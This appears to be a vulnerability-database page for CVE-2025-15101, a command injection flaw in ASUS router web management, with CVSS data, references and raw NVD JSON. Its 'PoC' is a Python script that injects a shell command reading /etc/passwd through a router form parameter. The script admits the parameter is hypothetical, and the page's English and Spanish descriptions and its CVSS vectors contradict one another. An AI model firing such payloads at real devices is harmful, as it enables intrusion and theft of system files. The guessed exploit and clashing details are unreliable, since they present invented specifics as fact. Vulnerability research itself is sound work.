CVE-2025-15101

Description

An OS command injection vulnerability in the web management interface of certain ASUS router models allows remote authenticated administrators to execute arbitrary system commands via a crafted parameter. Refer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:asus:asus_firmware:*:*:*:*:*:*:*:* - VULNERABLE

ASUS Router (Specific models - refer to vendor advisory)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_ip = "192.168.1.1"
target_url = f"http://{target_ip}/apply.cgi"
username = "admin"
password = "admin"

# Authenticate and get session (Simplified for PoC)
session = requests.Session()
login_data = {"login_authorization": "Base64EncodedCredentials"}
# session.post(target_url, data=login_data) # Assume login step

# Malicious payload to inject command
# Example: Rebooting the router or leaking /etc/passwd
# Injecting a semicolon to chain commands
payload = "; cat /etc/passwd > /tmp/pwned.txt"

# Vulnerable parameter structure (Hypothetical based on common ASUS router APIs)
exploit_data = {
    "action_mode": " Apply",
    "current_page": "Main_Operation_Content.asp",
    "next_page": "index.asp",
    "system_cmd": payload  # The vulnerable parameter
}

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"http://{target_ip}/"
}

try:
    # Send exploit payload
    response = session.post(target_url, data=exploit_data, headers=headers, timeout=10)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully!")
        print("[+] Check if the command was executed (e.g., file created or DNS ping).")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15101
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15101
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15101/
[4] VulDB https://vuldb.com/cve/CVE-2025-15101
[5] https://www.asus.com/security-advisory/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15101", "sourceIdentifier": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "published": "2026-03-26T03:16:02.400", "lastModified": "2026-05-13T04:17:02.273", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS command injection vulnerability in the web management interface of certain ASUS router models allows remote authenticated administrators to execute arbitrary system commands via a crafted parameter.\nRefer to the 'Security Update for ASUS Router Firmware' section on the ASUS Security Advisory for more information."}, {"lang": "es", "value": "Una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) ha sido identificada en la interfaz de gestión web de ciertos modelos de router ASUS. Esta vulnerabilidad permite potencialmente que se realicen acciones con los privilegios existentes de un usuario autenticado en el dispositivo afectado, incluyendo la capacidad de ejecutar comandos del sistema a través de mecanismos no intencionados.\nConsulte la sección 'Security Update for ASUS Router Firmware' en el Aviso de Seguridad de ASUS para más información."}], "metrics": {"cvssMetricV40": [{"source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:asus_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.0.0.6_102", "matchCriteriaId": "16C7B1D4-C9E4-420A-974E-816CEE4C159E"}]}]}], "references": [{"url": "https://www.asus.com/security-advisory/", "source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "tags": ["Vendor Advisory"]}]}}